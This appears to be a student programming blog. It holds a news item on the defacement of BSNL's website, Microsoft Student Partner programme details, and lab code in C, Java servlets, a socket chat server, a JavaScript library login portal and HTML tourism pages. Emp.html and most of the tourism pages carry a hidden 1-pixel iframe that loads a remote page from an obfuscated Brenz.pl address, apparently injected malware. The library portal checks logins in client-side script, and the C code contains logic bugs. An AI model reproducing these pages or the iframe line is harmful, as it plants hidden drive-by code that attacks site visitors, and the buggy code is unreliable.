MeansOFminE

MeansOFminE


The Web site of Bharat Sanchar Nigam Ltd - bsnl.co.in - has been hacked by Pakistani

Posted:


Screenshot of the hacked BSNL site
Screenshot of the hacked BSNL site



The Web site of Bharat Sanchar Nigam Ltd - bsnl.co.in - has been hacked. 
 
A message posted on the site, purportedly by a Pakistani hacker, said: "Hax3d by KhantastiC haXor - Bharat Sanchar Nigam Ltd – India's No. 1 Telecommunications Company. 


The hacker claimed in the message put out in the BSNL site, "You have been pwned by Pakistani hacker. This is not a joke or dream, this is f*****g reality, kids. This is now just a warning!!

"Deleted Every Database!! Muwah <3…. Backup in my Pocket=p ohh I means in ma Flash Drive = D."

The site has not been available since morning.


About hacker!!
 

A Google+ page of KhantastiC haXor purportedly of the hacker has not much info, but displays his 'KhanistiC haXor' name in bold. There are three persons in KhantastiC haXor's circles and two of them have him in their circles. 


Another site shows How BSNL's site was hacked, but we are not sure it is by KhantastiC haXor. 

BSNL reply:


In a response, BSNL said "the Web site was hacked around 6 p.m. on October 26. It came to our notice today and has been restored as of 2 p.m. (October 27). Our Web site has general information such as BSNL tariffs. There is no customer data on the Web site so there is no question of any data being stolen or deleted. We will undertake security audit and also take suitable measures for hardening the Web site security."

Creation of SYMBOL TABLE using C

Posted:


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEP9VeAUsj2KgOG_X7QGVoEl_mJxcqG46JZHSG_EnhTea9qTAb_kQ757GHWqLF9xUyisGJ3B059Ce92_4NRnxr6oQWuJJxUyfGhbxFX-T6KF-wS7Z39eRbCE_7tQ-aNr4tnR1rYFhMlAfe/s1600/c+and+c%252B%252B+meansofmine.jpgAIM:

To write a C program to understand the working function of assembler in first pass
creating symbol table where the tables are entered in the first pass along with the
corresponding addresses.

ALGORITHM:

STEP 1: Start the program execution.
STEP 2: Create a structure for opcode table and assign the values.
STEP 3: Create a structure for symbol table and assign the values.
STEP 4: Create a structure for intermediate code table and assign the values.
STEP 5: Write the opcode in separate file and machine code in another separate file.
STEP 6: Open the opcode file and compare it with the given machine code and then
generate opcode for corresponding source code.
STEP 7: Check the forward reference in intermediate code and print the corresponding
jump statement address.
STEP 8: Compare machine code with the opcode.If any jump statement with backward
reference is present, then print backward reference address.
STEP 9: For symbol table, print the symbol and address of the symbol.
STEP 10: Stop the program execution.

PROGRAM:

#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
#include<string.h>
struct table
{
char var[10];
int value;
};
struct table tbl[20];
int i,j,n;
void create();
void modify();
int search(char variable[],int n);
void insert();
void display();
void main()
{
int ch,result=0;
char v[10];
clrscr();
do
{
printf("Enter ur choice:\n1.Create\n2.Insert\n3.Modify\n4.Search\n5.Display\n6.Exit");
scanf("%d",&ch);
switch(ch)
{
case 1:
create();
break;
case 2:
insert();
break;
case 3:
modify();
break;
case 4:
printf("Enter the variabe to be searched\n");
scanf("%s",&v);
result=search(v,n);
if(result==0)
printf("The variable does not belong to the table\n");
else
printf("The location of variable is %d. The value of %s is %d",
result,tbl[result].var,tbl[result].value);
break;
case 5:
display();
break;
case 6:
exit(1);
}
}
while(ch!=6);
getch();
}
void create()
{
printf("Enter the number of entries\n");
scanf("%d",&n);
printf("Enter the variable and the value:\n");
for(i=1;i<=n;i++)
{
scanf("%s%d",tbl[i].var,&tbl[i].value);
check:
if(tbl[i].var[0]>='0' && tbl[i].var[0]<='9')
{
printf("The variable should start with an alphabet\nEnter the correct variable name\n");
scanf("%s%d",tbl[i].var,&tbl[i].value);
goto check;
}
check1:
for(j=1;j<1;j++)
{
if(strcmp(tbl[i].var,tbl[j].var)==0)
{
printf("The variable already exists.\nEnter another variable\n");
scanf("%s%d",tbl[i].var,&tbl[i].value);
goto check1;
}
}
}
printf("The table after creation is\n");
display();
}
void insert()
{
if(i>=20)
printf("Cannotinsert. Table is full");
else
{
n++;
printf("Enter the variable and value\n");
scanf("%s%d",tbl[n].var,&tbl[n].value);
check:
if(tbl[i].var[0]>='0' && tbl[i].var[0]<='9')
{
printf("The variable should start with alphabet\nEnter the correct variable name\n");
scanf("%s%d",tbl[i].var,&tbl[i].value);
goto check;
}
check1:
for(j=1;j<n;j++)
{
if(strcmp(tbl[j].var,tbl[i].var)==0)
{
printf("The variable already exist\nEnter another variable\n");
scanf("%s%d",tbl[i].var,&tbl[i].value);
goto check1;
}
}
printf("The table after insertion is\n");
display();
}
}
void modify()
{
char variable[10];
int result=0;
printf("Enter the variable to be modified\n");
scanf("%s",&variable);
result=search(variable,n);
if(result==0)
printf("%sdoes not belong to the table",variable);
else
{
printf("The current value of the variable%s is %d, Enter the new variable and its
value",tbl[result].var,tbl[result].value);
scanf("%s%d",tbl[result].var,&tbl[result].value);
check:
if(tbl[i].var[0]>='0' && tbl[i].var[0] <= '9')
{
printf("The variable should start with alphabet\n Enter the correct variable name\n");
scanf("%s%d",tbl[i].var,&tbl[i].value);
goto check;
}
}
printf("The table after modification is\n");
display();
} int search(char variable[],int n)
{
int flag;
for(i=1;i<=n;i++)
{
if(strcmp(tbl[i].var,variable)==0)
{
flag=1;
break;
}
}
if(flag==1)
return i;
else
return 0;
}
void display()
{
printf("Variable\t value\n");
for(i=1;i<=n;i++)
printf("%s\t\t%d\n",tbl[i].var,tbl[i].value);
}
 
OUTPUT:

Enter ur choice:
1.Create
2.Insert
3.Modify
4.Search
5.Display
6.Exit
1
Enter the number of entries
2
Enter the variable and the value:
A 26
B 42
The table after creation is
Variable value
A 26
B 42
Enter ur choice:
1.Create
2.Insert
3.Modify
4.Search
5.Display
6.Exit
2
Enter the variable and value
D 10
The table after insertion is
Variable value
A 26
B 42
D 10
Enter ur choice:
1.Create
2.Insert
3.Modify
4.Search
5.Display
6.Exit
3
Enter the variable to be modified
D
The current value of the variableD is 10, Enter the new variable and its value
C
20
The table after modification is
Variable value
A 26
B 42
C 20
Enter ur choice:
1.Create
2.Insert
3.Modify
4.Search
5.Display
6.Exit
4
Enter the variabe to be searched
A The location of variable is 1. The value of A
is 26
Enter ur choice:
1.Create
2.Insert
3.Modify
4.Search
5.Display
6.Exit
5
Variable value
A 26
B 42
C 20
Enter ur choice:
1.Create
2.Insert
3.Modify
4.Search
5.Display
6.Exit

Microsoft Student Partner (MSP) selection process is based on!!

Posted:

The results of the MSP selection process in India depends on a very complex combination of a number of factors:
 
• Performance of candidates in various rounds. If a candidate does well in each round, better the chances.
• Relative performance of a candidate in relation to other candidates from the same college, city, region etc.
• Number of existing MSPs from a particular college, city, region etc.
• Current Year of Course
• Nature of Course
• Academic performance
• References

So, your score in the first IT Challenge quiz is just one component of a much larger set of factors.

Microsoft Student Partner (MSP) India Program

Posted:

Program Overview:
The Microsoft Student Partner Program recognizes top young minds from around the world that are passionate about technology. It's a once in a lifetime opportunity to develop real-world skills to help you succeed in your future career, to help others learn about the technology of today and tomorrow, and to connect with other like-minded students, all whilst having a ton of fun along the way. The tenure is for 1 academic year and can be renewed by the MSP India Team if the MSP has acceptable performance and continues to meet the eligibility criteria.
 
What is a Microsoft Student Partner?The 'ideal candidate' would be a passionate and enthusiast individual who wants to learn about new tools and technologies. You would need to have a whole range of skills including excellent time management, organization and communication skills to ensure that you could host successful campus events. An MSP should be comfortable and confident presenting in front of large audiences of both students and faculty members. General marketing skills come in very handy in order to allow you to articulate your ideas effectively when presenting. MSPs are social, friendly and approachable individuals who like to meet new people. You will require the ability work as a team as well as use your own initiative. In summary, MSPs are innovative and creative students who are extremely passionate about technology and who like to help others.
 
MSP India Program
2011-2012 Academic Year Selection Process
How to apply? 

The deadline for registering for the 2011-2012 Academic Year has elapsed
. Results will be announced by 14th November 2011.

  • Part 1: You will need to create a video of yourself speaking about a Microsoft technology and upload it to YouTube. This is to judge your public-speaking skills and confidence. MSPs conduct a lot of technical sessions and other activities in which they interact with their peers and colleagues. Thus, an MSP has to be fluent in English and be able to put his/her point across. In this round, emphasis will be on Clarity of communication and Quality of content.
    • Specifications:
      * The duration of the video has to be between 3 to 4 minutes (minimum 3 minutes and maximum 4 minutes)
      * You have to be clearly visible in the video- we want to see and hear you speaking. No PowerPoint presentations, screencasts, webcasts etc. will be allowed.
      * All content has to be genuine. It should not contain any copyrighted material without express consent of the owner.
      * Make sure the video is of your own creation.
      * The video has to be interesting and engaging. Through the video you have to show us why you should be selected for the MSP Program. There will be hundreds of videos submitted, so be original in the video.
      * The deadline for submitting the URL of your video has elapsed.

    • Topics for the video:
      You have to choose from any one of the following topics ONLY:
      * Cloud Computing (Azure or Office 365)
      * Web (ASP.NET or WebMatrix or WebPI or Silverlight)
      * Mobile (Application development for Windows Phone 7)
      * Client (Application development for Windows 7, WPF)
      * Windows Embedded
      * Microsoft Robotics Developer Studio
      * Application development using XNA Game Studio
      * Expression Studio
      * Windows Server 2008 R2
      * SQL Server 2008 R2

    • Tips to make the video interesting:* You have to be clearly visible. We want to see and hear you speak.
      * Make sure you are audible. Audio quality is more important than video quality.
      * Be creative. Think of ways to make your video presentation memorable for the audience.
      * Don't read from a paper or a computer screen. Make your presentation dynamic, so that people can enjoy watching it.
      * Don't just copy an existing video from YouTube, Channel 9 or a Microsoft video. We want to gain an insight into your understanding and interest in the technology you choose to speak on.

  • Part 2: Get your Windows Phone 7 App certified on AppHub.
    • * Using your DreamSpark account, setup a free "Student" AppHub account at http://create.msdn.com/SendtoXboxcom.aspx
    • * Create your app using the free development tool and emulator available at http://create.msdn.com/en-us/resources/downloads
    • * If you do not have access to a machine that supports these dev tools, you can use a third-party web-based utility like http://bit.ly/wp7appmakr to create an app (e.g. for your personal blog or for an RSS feed relevant to your college or your city). Here's a demo video: http://www.facebook.com/video/video.php?v=149172155146650
    • * Go through the steps listed at http://create.msdn.com/en-US/home/about/app_submission_walkthrough
    • * Ensure that the Support/Contact Email Address that you provide on AppHub is the same as the one that you provided during registration for the MSP selection process. This is very important- so do this properly.
    • * Work towards getting your apps certified by 18th October 2011. Submit your apps on AppHub early so that you get at least a week before the deadline to go through the certification process.
    • * The goal of this exercise is to assess your understanding of the AppHub certification process. So there is no need to complicate your app development. There will be other opportunities later this year for students to showcase complex and innovative apps.
    • * The deadline for this Part has elapsed.

The main one-hour Quiz can then be taken online at http://www.imaginecup.com/Competition/mycompetitionportal.aspx?competitionId=65 at any of the following times: 
Start time in Indian Standard Time (IST)
05:30 on 20th October in India
08:30 on 20th October in India
11:30 on 20th October in India
14:30 on 20th October in India
17:30 on 20th October in India
20:30 on 20th October in India
23:30 on 20th October in India
02:30 on 21st October in India

Imagine Cup website support: http://www.imaginecup.com/Support/ContactUs.aspx
    •  * The deadline for this Part has elapsed.

Disclaimer: This is a voluntary program for students and does not involve any fees. It is neither a course nor an internship.

Eligibility: To consider applying for the MSP Program, you must be:
  • * Over 17 years of age. 
  • * Currently studying a full-time Science, Technology, Engineering, Math or Design (STEMD) course at an officially recognized University/College in India.
  • * Bachelor's/Master's Degree student who will complete the course during or after May 2012.
Competencies: A good MSP is one who has the following basic qualities:
  • * Technical competencies
  • * Passionate about software
  • * Quick learner
  • * Respected by peers
Community-building competencies:
  • * Enthusiastic about technology
  • * High level of social activity, both online & offline
  • * Can organize college and city-level events
Fundamental competencies:
  • * Passionate about Microsoft technologies
  • * Confident & outgoing
  • * Good rapport with faculty
  • * Willing to share knowledge & eager to uplift self and peers
Responsibilities: If you get selected as an MSP, here's an indication of some of your short term goals:
  • * Learn & implement emerging technologies like Windows Phone 7 apps using the free tools & emulator.
  • * Conduct at least 1 technical session per month in a Student Tech Club.
  • * Participate and drive entries for Imagine Cup.
If you get selected as an MSP, here's an indication of some of your long term goals:
  • * Promote and build your city-level Microsoft Student User Group
  • * Organize city-level events like DreamSpark Yatra by collaborating with other MSPs
  • * Mentor other MSPs
Benefits: As an MSP, a host of benefits are available:
  • * Welcome letter
  • * Special MSP events conducted by Microsoft
  • * MSDN subscription after successful completion of probation period
  • * Rewards & Recognition for top performers
  • * Networking opportunities
  • * Technical training & resources
  • * Specific Microsoft events
  • * Interactions with MVPs & Microsoft Employees
  • * Internship & Recruitment announcements for top-performers


Contact Us:


Employee Information System using JDBC and implementing the doGet() and doPost() method

Posted:


Employee Information System using doGet( ) and doPost() Method

AIM
          To create an Employee Information System using JDBC and implementing the doGet() and doPost() method.

ALGORITHM
Step 1: Start the program.
Step 2: Create a Java Source file which creates an HttpServlet class called GetDeatils.
Step 3: Initialize the servlet.
Step 4: In the doGet() method, establish the connection with the DSN called emp.
Step 5: After connection establishment, query the database and select all records in the
            emp table.       
Step 6: Create another Java Source file that  creates an HttpServlet class called
            PostDeatils.
Step 7: Initialize the servlet.
Step 8: In the doPost() method, establish the connection with the DSN called emp.
Step 9: Create an XHTML file called emp.html.
Step 10: Invoke the GetDetails Class by clicking the GET button in the emp.html.
Step 11: Display all records in the web browser.
Step 12: Fill all the relevant employee information fields in emp.html file and click the
              POST button.
Step 13: The POST button invokes the PostDetails class.
Step 14: Insert a new record through by executing sql query and get record updated
Step 15: Close ResultSet and database connection.
 Step 7: Stop the process.


GetDetails.java

import java.io.*;
import java.sql.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class GetDetails extends HttpServlet {
  Connection con;
  PrintWriter out;
  ResultSet rs;
   public void init(ServletConfig config) throws ServletException {
        super.init(config);
      
    con=null;
    out=null;
    rs=null;
    }
          public void destroy() {
     try
        {
   
      con.close();
      out.close();
      rs.close();
    }
    catch(SQLException se)
            {
      out.println(se.toString());
    }
    }
   
        protected void processRequest(HttpServletRequest request, HttpServletResponse response)
    throws ServletException, IOException {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        out.close();
    }
    
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
    throws ServletException, IOException {
    out=response.getWriter();
       try{
      Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
      con=DriverManager.getConnection("jdbc:odbc:emp");
      PreparedStatement pstmt=null;
      String query=null;
      query="select name,age,address,desig from emp";
      pstmt=con.prepareStatement(query);
      rs=pstmt.executeQuery();
      out.println("<b><center>Employee Details</center></b><br><br>");
      out.println("<table align=center border=1 cellpadding=2>");
      while(rs.next())
      {
        out.println("<tr>");
        out.println("<td>" + rs.getString("name") + "</td>");
        out.println("<td>" + rs.getString("age") + "</td>");
        out.println("<td>" + rs.getString("address") + "</td>");
        out.println("<td>" + rs.getString("desig") + "</td>");
        out.println("</tr>");
      }
      out.println("</table>");
      out.println("</body>");
    }
    catch(Exception e){
      out.println(e.toString());
    }
            
        processRequest(request, response);
  
    }
  }


PostDetails.java

import java.io.*;
import java.sql.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class PostDetails  extends HttpServlet {
  Connection con;
  PrintWriter out;
  ResultSet rs;
    public void init(ServletConfig config) throws ServletException
    {
        super.init(config);
          
    con=null;
    out=null;
    rs=null;
    }
   
    public void destroy()
    {
      //con.close();
      out.close();
     // rs.close();
    }
   
      protected void processRequest(HttpServletRequest request, HttpServletResponse response)
    throws ServletException, IOException
      {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        out.close();
      }
     
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
    throws ServletException, IOException
    {
       
        out=response.getWriter();
        String name=request.getParameter("name");
         String age=request.getParameter("age");
          String address=request.getParameter("address");
           String desig=request.getParameter("desig");
              String id=request.getParameter("id");
       try
       {
      Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
      con=DriverManager.getConnection("jdbc:odbc:emp");
      PreparedStatement pst=null;
     String sql = "insert into emp values (?,?,?,?,?)";
   pst = con.prepareStatement(sql);
  pst.setString(1, name);
  pst.setString(2, age);
  pst.setString(3, address);
  pst.setString(4, desig);
    pst.setString(5,id);
  pst.executeUpdate();
   out.println(" Updated ");
  
       }
    catch(Exception e){
      out.println(e.toString());
    }
         processRequest(request,response);
       
    }
      
}


Emp.html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 
<html>
  <head>
      <title>Employment Information System</title>
      <h1 align=center>EMPLOYMENT INFORMATION SYSTEM<h1>
  </head>
  <body>
  
  <form action='EmployeeDetails' method="get">
<center> <label style='color:blue'>Click Here to View the Records:</label>  <input type='submit' value='Get'>
</center>
  </form>
  <iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
<form action ='S' method='post'>
<h1 align=center style='color:blue'> Enter the Employee Details Here!</h1>
<table border='2' ALIGN=center>
<tr>
<td> <label style='color:green'>Name: </label></td><td><input type=text name='name'></td>
</tr>
<tr>
<td> <label>Age:</label></td><td><input type=text name='age'></td>
</tr>  
<tr>
 <td><label>Address       :</label></td><td><input type=text name='address'></td>
  </tr>  <tr>
   <td><label>Designation:</label></td><td><input type=text name='desig'></td>
  </tr>  
<tr>
<td> <label>ID Number:</label> </td><td><input type=text name='id'></td>
</tr>  
<tr>
 <td><label>Click Here to Update the Records:</label><input type =submit method =post value='post' size='70' style='color:red'>
 </td>
</tr>
</tabel>
</form>
</body>
</html>

Java program to create Instant Messenger application for communication between multiple clients

Posted:

INSTANT MESSENGER
 
AIM
          To write a java program for creating Instant Messenger application for communication between multiple clients.


ALGORITHM

Step 1: Start the process.

Step 2: Create the client module as  class Client by extending thread
   class.

Step 3: Create the Server module as class Server for accepting
   connection from clients.

Step 4: Create ClientThread class in Server module to make 10 clients
   to communuicate.

Step 5: Start the Server.

Step 6: After Server is ready, then run the clients to communicate with
  each other.

Step 6: Terminate the clients and Server respectively.

Step 7: Stop the process.


Source Code

Client.java

import java.io.*;
import java.net.*;
public class Client implements Runnable
{
            static Socket socket=null;
            static PrintStream output;
            static BufferedReader input=null;
            static BufferedReader userip=null;
            static boolean flag=false;
            public static void main(String[] args)
            {
                        int port=1234;
                               String host="localhost";
                        try
                        {
                                    socket=new Socket(host,port);
                                    userip=new BufferedReader(new InputStreamReader(System.in));
                                    output=new PrintStream(socket.getOutputStream());
                                    input=new BufferedReader(new InputStreamReader(socket.getInputStream()));
                        }
                        catch(Exception e)
                        {
                                    System.err.println("Unknown host"+host);
                        }
                        if(socket!=null)
                        {
                                    try
                                    {
                                                new Thread(new Client()).start();
                                                while(!flag)
                                                {
                                                output.println(userip.readLine());
                                                }
                                    output.close();
                                    input.close();
                                    socket.close();
                        }
                        catch(Exception e1)
                        {
                                    System.err.println("IOException"+e1);
                        }
            }
}
public void run()
{
String msg;
try
{
while((msg=input.readLine())!=null)
System.out.println(msg);
flag=true;
}
catch(IOException e)
{
System.err.println("IOException" + e);
}
}
}


Server.java

import java.io.*;
import java.net.*;
public class Server
{
      static ServerSocket server=null;
      static Socket socket=null;
      static ClientThread th[]=new ClientThread[10];
      public static void main(String args[])
      {
            int port=1234;
            System.out.println("Server started...");
            System.out.println("  [Press Ctrl C to terminate ]");
            try
            {
                  server=new ServerSocket (port);
            }
            catch(IOException e)
            {
                  System.out.println("Exception for Input/Output");
            }
            while(true)
            {
                  try
                  {
                        socket=server.accept();
                        for(int i=0;i<=9;i++)
                        {
                              if(th[i]==null)
                              {
                                    (th[i]=new ClientThread(socket,th)).start();
                                    break;
                              }
                        }
                        }
                        catch(IOException e)
                        {
                              System.out.println("Exception for Input/Output");
                        }
                  }
            }
      }

      class ClientThread extends Thread
      {
            BufferedReader input=null;
            PrintStream output=null;
            Socket socket=null;
            ClientThread th[];
            public ClientThread(Socket socket,ClientThread[] th)
            {
                  this.socket=socket;
                  this.th=th;
            }
            public void run()
            {
                  String msg;
                  String username;
                  try
                  {
                        input = new BufferedReader(new InputStreamReader(socket.getInputStream()));
                        output = new PrintStream(socket.getOutputStream());
                        output.println("What is your Name?Enter it-");
                        username = input.readLine();
                        output.println(username + ":Welcome to chat room.");
                        output.println("To leave chat room type $$");
                        for (int i = 0; i <= 9; i++)
                              if (th[i] != null && th[i] != this)
                                    th[i].output.println("------------A new user arrived in chat Room:" + username);
                              while (true)
                              {
                                    msg = input.readLine();
                                    if (msg.startsWith("$$"))
                                          break;
                                    for (int i = 0; i <= 9; i++)
                                          if (th[i] != null)
                                                th[i].output.println("<" + username + ">" + msg);
                              }
                              for (int k = 0; k <= 9; k++)
                                    if (th[k] != null && th[k] != this)
                                          th[k].output.println("------A user Leaving chat Room:" + username + "--------");
                              output.println("Press Ctrl C to return to prompt---");
                              for (int j = 0; j <= 9; j++)
                                    if (th[j] == this)
                                          th[j] = null;
                              input.close();
                              output.close();
                              socket.close();
                  }
                  catch (IOException e)
                  {
                        System.out.println("Exception for Input/Output");
                  }
                  }
            }

ONLINE PORTAL FOR DISTRIBUTED LIBRARY INFORMATION SYSTEM

Posted:


ONLINE PORTAL FOR DISTRIBUTED LIBRARY INFORMATION SYSTEM
AIM:
            To create a online portal for distributed library information system using Java Script.

ALGORITHM:
STEP 1: Start the process.
STEP 2: Design the index.html code for checking the authorized user.
STEP 3: Design the books.html code and access through the index.html code.
STEP 4: Enter book name, author name, publication and edition details in the relevant text boxes and click the search button.
STEP 5: Display all the records which matches the above data.
STEP 6: Stop the process.

Index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<title>Online Library Portal</title>
<script type="text/javascript" >
function login()
{
var con = new ActiveXObject("ADODB.Connection")
con.Open("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:/library.mdb")
var rs = new ActiveXObject("ADODB.Recordset")
rs.Open("select * from users",con)
while(!rs.EOF)
{alert(rs('id'))
if(rs('nam')==document.getElementById('unam').value&&rs('pass')==document.getElementById('pass').value)
{
rs.close()
con.close()
window.navigate('books.html')
}
rs.movenext
}
err.innerText='Wrong Credentials'
rs.close()
con.close()
}
</script>
</head>
<body>
<form id="log">
<table align="center" >
<tr><td>Username</td><td>
<input type="text" id="unam" style="width: 130px">
</td></tr>
<tr><td style="height: 53px">Password</td>
<td style="height: 53px">
<input type="password" id="pass" style="width: 130px"></td>
<td style="width: 103px; height: 53px;">
<label id="err"></label>
</td></tr>
<tr><td></td>
<td style="text-align:center ">
<input type="button" value="Log In" style="width: 70px; height: 26px" onclick="login()">
</td></tr>
</table>
</form>
</body>
</html>

Books.html
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type">
<title>Online Library Portal</title>
<script type="text/javascript">
function sear() {
var con = new ActiveXObject("ADODB.Connection")
con.Open("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:/library.mdb")
var rs = new ActiveXObject("ADODB.Recordset")
rs.Open("select * from books",con)
var ta='<table align=\'center\' width=\'80%\' border=\'1\'><tr><th>Book</th><th>Author</th><th>Publisher</th><th>Edition</th></tr>'
while(!rs.EOF)  {
if(rs('nam')==document.getElementById('book').value&&rs('author')==document.getElementById('auth').value&&rs('publisher')==document.getElementById('pub').value&&rs('edi')==document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
rs.movefirst
while(!rs.EOF)
{
if(rs('nam')==document.getElementById('book').value&&rs('author')==document.getElementById('auth').value&&rs('publisher')==document.getElementById('pub').value&&rs('edi')!=document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
rs.movefirst
while(!rs.EOF)
{
if(rs('nam')==document.getElementById('book').value&&rs('author')==document.getElementById('auth').value&&rs('publisher')!=document.getElementById('pub').value&&rs('edi')!=document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
rs.movefirst
while(!rs.EOF)
{
if(rs('nam')==document.getElementById('book').value&&rs('author')!=document.getElementById('auth').value&&rs('publisher')!=document.getElementById('pub').value&&rs('edi')!=document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
rs.movefirst
while(!rs.EOF)
{
if(rs('nam')!=document.getElementById('book').value&&rs('author')==document.getElementById('auth').value&&rs('publisher')!=document.getElementById('pub').value&&rs('edi')!=document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
rs.movefirst
while(!rs.EOF)
{
if(rs('nam')!=document.getElementById('book').value&&rs('author')!=document.getElementById('auth').value&&rs('publisher')==document.getElementById('pub').value&&rs('edi')!=document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
rs.movefirst
while(!rs.EOF)
{
if(rs('nam')!=document.getElementById('book').value&&rs('author')!=document.getElementById('auth').value&&rs('publisher')!=document.getElementById('pub').value&&rs('edi')==document.getElementById('edi').value)
{
ta+='<tr><td><a href="books/'+rs('id')+'.pdf">'+rs('nam')+'</a></td><td>'+rs('author')+'</td><td>'+rs('publisher')+'</td><td>'+rs('edi')+'</td></tr>'
}
rs.movenext
}
ta+='</table>'
result.innerHTML=ta
rs.close()
con.close()
}
</script>
</head>
<body>
<form id="search">
<table align="center" >
<tr><td>Book</td>
<td><input type="text" id="book" style="width: 200px">
</td> </tr>
 <tr> <td> Author</td><td>
<input type="text" id="auth" style="width: 200px">
</td></tr>
<tr><td>Publisher</td>
<td><input type="text" id="pub" style="width: 200px">
</td> </tr>
<tr><td>Edition</td>
<td><input type="text" id="edi" style="width: 200px">
</td></tr>
<tr><td></td>
<td style="text-align:center ">
<input type="button" id="search" value="Search" onclick="sear()">
</td></tr>
</table>
</form>
<div id="result">   </div>
</body>
</html>

To create map using HTML

Posted:

 
TOURISM INFORMATION SYSTEM
 
AIM:
        To create a web application for tourism information system using HTML.

ALGORITHM

Step1: Start the process.
Step2: Load an image in the page.
Step3: Define the map area in the loaded image.
Step4: Show the hot spots in the page.
Step5: Display the details of the hot spot in the page.
Step6: Stop the process.

CODING:

home.html:
<html>
<Title>Namakkal Tourism Information System</title>
<h1 align=center> WELCOME TO NAMAKKAL </H1>
<body bgcolor=wheat>
<p><CENTER><img src="file:///D:/Documents and Settings/STUDENT/Desktop/namakkal.gif" width="593" height="406" border="0">
<p><strong><a href= "main.html"> Visit the Places</a></strong></p>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

main.html:
<html>
<h1 align=center> WELCOME TO NAMAKKAL</H1>
<Title>Namakkal Tourism Information System</title>
<body background="namakkals.gif">
<p><CENTER><img src="file:///D:/Documents and Settings/STUDENT/Desktop/map_namakkal.gif" width="593" height="406" border="0" usemap="#map">
<map name="map"></CENTER>

<area shape="circle" coords="195,175,20" href="tiruchengode.html">
<area shape="circle" coords="342,230,20" href="namakkal.html">
<area shape="circle" coords="120,148,20" href="palayam.html">
<area shape="circle" coords="470,185,20" href="kolli.html">
<area shape="circle" coords="378,119,20" href="rasipuram.html">
<area shape="circle" coords="268,130,20" href="mal.html">
</map>
</p>
<p><strong><center>CLICK THE MOUSE TO SELECT THE PLACE</strong></p></center>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

Kolli.html:
<html>
<head>
<title>KOLLI HILLS</title>
</head><body bgcolor="white">
<p align="center"><strong>WELCOME TO KOLLI HILLS</strong></p>
<p>SOME OF THE TOURIST PLACES IN KOLLI HILLS ARE</p>
<p >1.Hill temple</p>
<p>2.FIve Falls</p>
<p>3.Child park</p>
<p>4.Flower park</p>
<a href="main.html">Back to Home Page</a>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

Rasipuram.html:

<html>
<head>
<title>RASIPURAM</title>
</head><body bgcolor="white">
<p align="center"><strong>WELCOME TO  RASIPURAM</strong></p>
<p>SOME OF THE TOURIST PLACES IN RASIPUIRAM ARE</p>
<p align>1.MUTHAYAMMAL institutions</p>
<p align>2.Railway gate</p>
<p align>3.PAAVAI institituions</p>
<a href="main.html">Back to Home Page</a>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

mal.html:
<html>
<head>
<title>MALLASAMUTHIRAM</title>
</head><body bgcolor="orange">
<p align="center"><strong>WELCOME TO MALLASAMUTHIRAM</strong></p>
<p>SOME OF THE TOURIST PLACES IN MALLASAMUTHIRAM ARE</p>
<p >1.Murugan temple</p>
<p >2.Park</p>
<p>3.Govt school</p><html>
<a href="main.html">Back to Home Page</a>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

Palayam.html:
<html>
<head>
<title>PALLIPALAYAM</title>
</head><body bgcolor="white">
<p align="center"><strong>WELCOME TO PALLIPALAYAM</strong></p>
<p>SOME OF THE TOURIST PLACES IN PALLIPALAYAM ARE</p>
<p >1.RIVER</p>
<p>2.RAILWAY STATION</p>
<p>3.ESWARAN TEMPLE</p>
<a href=main.html>Back to Home Page</a>
<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>

